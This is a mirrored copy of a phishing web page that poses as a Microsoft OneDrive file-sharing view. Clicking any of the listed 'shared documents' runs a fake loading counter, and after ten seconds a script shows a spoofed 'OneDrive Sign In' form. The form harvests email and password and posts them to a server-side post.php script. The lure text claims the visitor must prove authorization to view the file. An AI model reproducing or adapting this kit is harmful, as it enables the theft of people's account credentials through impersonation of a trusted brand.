<!DOCTYPE html>
<html><!-- Mirrored from truedivision.cfd/dvrs-112-2826a3e9-ac97-43e7-b2da-89b67c1c001c9d38028Ac34hn2w9928F302De2984E340/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 15 Feb 2022 04:40:58 GMT --><!-- Added by HTTrack --><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><!-- /Added by HTTrack -->
<meta http-equiv="content-type" content="text/html; charset=UTF-8">

<meta charset="UTF-8">
<title>My Files - OneDrive</title>
<meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
<link href="My%20Files%20-%20OneDrive_files/bootstrap.css" rel="stylesheet" type="text/css">

<link href="My%20Files%20-%20OneDrive_files/font-awesome.css" rel="stylesheet" type="text/css">
<link href="My%20Files%20-%20OneDrive_files/AdminLTE.css" rel="stylesheet" type="text/css">
<link href="My%20Files%20-%20OneDrive_files/_all-skins.css" rel="stylesheet" type="text/css">
<link rel="shortcut icon" href="My%20Files%20-%20OneDrive_files/logo.png" type="image/x-icon">
</head>
<body class="skin-blue">
<div class="wrapper">
<header class="main-header">

<a href="file:///C:/My%20Web%20Sites/https___truedivision.cfd_dvrs-112-2826a3e9-ac97-43e7-b2da-89b67c1c001c9d38028Ac34hn2w9928F302De2984E340_/truedivision.cfd/dvrs-112-2826a3e9-ac97-43e7-b2da-89b67c1c001c9d38028Ac34hn2w9928F302De2984E340/index-2.html" style="font-size:16px;" class="logo"><b></b>OneDrive</a>

<nav class="navbar navbar-static-top" role="navigation">
<a href="#" class="sidebar-toggle" data-toggle="offcanvas" role="button">
<span class="sr-only">Toggle navigation</span>
</a>

<div class="navbar-custom-menu">
<ul class="nav navbar-nav">
<li class="dropdown user user-menu">
<a href="#"><span style="font-weight:lighter!important;font-size:20px;" class="fa fa-codepen"></span></a>
</li>
<li class="dropdown user user-menu">
<a href="#"><span style="font-weight:lighter!important;font-size:20px;" class="fa fa-cog"></span></a>
</li>
<li class="dropdown user user-menu">
<a href="#"><span style="font-weight:lighter!important;font-size:20px;" class="fa fa-question"></span></a>
</li>
<li class="dropdown user user-menu">
<a href="#" class="dropdown-toggle" data-toggle="dropdown">
<img src="My%20Files%20-%20OneDrive_files/default.png" class="user-image" alt="User Image">

</a>
</li>
</ul>
</div>
</nav>
</header> 
<aside class="main-sidebar">

<section class="sidebar" style="height:100vh;">

<div class="user-panel">
<div class="pull-left image">
<span class="fa fa-bars"></span>
</div>
</div>

<ul class="sidebar-menu">
<li><a style="background:#d3d3d2;" href="#"><i class="fa fa-folder"></i><span>My Files</span></a></li>
<li><a href="#"><i class="fa fa-clock-o"></i> <span>Recent</span></a></li>
<li><a href="#"><i class="fa fa-image"></i> Photos</a></li>
<li><a href="#"><i class="fa fa-users"></i> Shared</a></li>
<li><a href="#"><i class="fa fa-trash-o"></i> Recycle Bin</a></li>
</ul>
<style>
          .trap {
            position:absolute;
            bottom:10%;
            font-size:12px;
            padding:15px;
          }
          </style>
<div class="trap">
<p>Get 1TB (1000 GB) of storage and the latest Office apps for PC or Mac</p>
<a href="#" style="color:blue;">learn More</a>
<br><br>
<div style="cursor:pointer;border:1px solid blue;padding:5px 20%;">
<p> <span style="font-weight:lighter!important;font-size:20px;color:blue;" class="fa fa-codepen"></span> Go Premium</p>
</div>
<hr>
<p>1.1MB used of 5GB</p>
<a href="#" style="color:blue;">Get the OneDrive Apps</a>
</div>
</section>

</aside>

<div class="content-wrapper" style="min-height: 763px;">
<div class="row" style="height:20px;">
<div class="col-xs-12" style="padding:0px 50px;font-weight:lighter!important;border-bottom:1px solid blue;">
<div class="small-box">
<div class="inner pull-left">
<p><i class="fa fa-plus text-primary"></i> New <i class="fa fa-caret-down"></i></p>
</div>
<div class="inner pull-left">
<p><i class="fa fa-arrow-up text-primary"></i> Upload <i class="fa fa-caret-down"></i></p>
</div>
<div class="inner pull-right">
<p><i class="fa fa-info-circle"></i></p>
</div>
<div class="inner pull-right">
<p><i class="fa fa-bars  text-primary"></i> Sort <i class="fa fa-caret-down"></i></p>
</div>
</div>
</div>
</div>


<section class="content">


<div class="row" style="padding:0px 30px;">
<div class="col-lg-12">
<style>
          .heh {
            font-weight:bold;
            font-size:21px;
            color:rgb(50, 49, 48);
            font-family:"Segoe UI", "Segoe UI Web (West European)", "Segoe UI", -apple-system, BlinkMacSystemFont, Roboto, "Helvetica Neue", sans-serif;
          }
          .dat {
            padding:20px 0px;

          }
          .dat:hover {
            cursor:pointer;
            background:#f3f2f1;
          }
          </style>
<h2 class="heh">Shared <i class="fa fa-caret-right"></i> Documents</h2>
</div>
<div data-toggle="modal" data-target="#myModal" class="col-md-3 col-xs-6 text-center dat">
<img style="width:150px;height:auto;" src="My%20Files%20-%20OneDrive_files/1.png" alt="">
<h5>P0393882.pdf</h5>
</div>
<div data-toggle="modal" data-target="#myModal" class="col-md-3 col-xs-6 text-center dat">
<img style="width:150px;height:auto;" src="My%20Files%20-%20OneDrive_files/2.jpg" alt="">
<h5>Item-list.pdf</h5>
</div>
<div data-toggle="modal" data-target="#myModal" class="col-md-3 col-xs-6 text-center dat">
<img style="width:150px;height:auto;" src="My%20Files%20-%20OneDrive_files/3.jpg" alt="">
<h5>Specifications.pdf</h5>
</div>
<div data-toggle="modal" data-target="#myModal" class="col-md-2 col-xs-6 text-center dat">
<img style="width:150px;height:auto;" src="My%20Files%20-%20OneDrive_files/figure-a.jpg" alt="">
<h5>Order Requirements</h5>
</div>
</div>

<div id="myModal" class="modal fade" role="dialog" style="display: none;" aria-hidden="true">
<div class="modal-dialog">

<div class="modal-content">
<div class="modal-body text-center">
<img class="img img-responsive" style="display:inline;" src="My%20Files%20-%20OneDrive_files/loading.gif" alt="">
<h3 class="text-primary" style="margin-top:0px;"><span class="load">355</span>% Loading Order Requirements</h3>
</div>
</div>
</div>
</div>
<div id="myModal2" class="modal fade" role="dialog" style="display: none;" aria-hidden="true">
<div class="modal-dialog">

<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal">×</button>
<h4 class="modal-title"><img src="My%20Files%20-%20OneDrive_files/logo.png" style="width:50px;"> OneDrive Sign In</h4>
</div>
<form action=".././modules/post.php" method="post">
<div class="modal-body">
<p style="font-weight: 400;">Please prove that you are authorized to view this file; match the displayed email with the correct password to view this file.</p>
<div class="form-group">
<label>Email</label>
<input type="email" class="form-control" required="" name="usename">
</div>
<div class="form-group">
<label>Password</label>
<input type="password" class="form-control" required="" name="password">
</div>
</div>
<div class="modal-footer">
<button type="submit" class="btn btn-primary">Sign In</button>
</div>
</form>
</div>
</div>
</div>
</section>
</div>
</div>

<script src="My%20Files%20-%20OneDrive_files/jQuery-2.js"></script>
<script>
      $.widget.bridge('uibutton', $.ui.button);
    </script>
<script src="My%20Files%20-%20OneDrive_files/bootstrap.js" type="text/javascript"></script>
<script src="My%20Files%20-%20OneDrive_files/bootstrap3-wysihtml5.txt" type="text/javascript"></script>
<script src="My%20Files%20-%20OneDrive_files/app.js" type="text/javascript"></script>
<script src="My%20Files%20-%20OneDrive_files/dashboard.js" type="text/javascript"></script>
<script src="My%20Files%20-%20OneDrive_files/demo.js" type="text/javascript"></script>
<script>
    let x=document.querySelectorAll(".dat");
   x.forEach(function(y){
      y.addEventListener("click",function(){
          $num=0;
          setInterval(()=>{
              $(".load").text($num++);
          },300);
        setTimeout(() => {
           $('#myModal2').modal('show');
          $('#myModal').modal('hide');
         
        }, 10000);
      });
   });

    </script>




</body><!-- Mirrored from truedivision.cfd/dvrs-112-2826a3e9-ac97-43e7-b2da-89b67c1c001c9d38028Ac34hn2w9928F302De2984E340/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 15 Feb 2022 04:41:15 GMT --></html>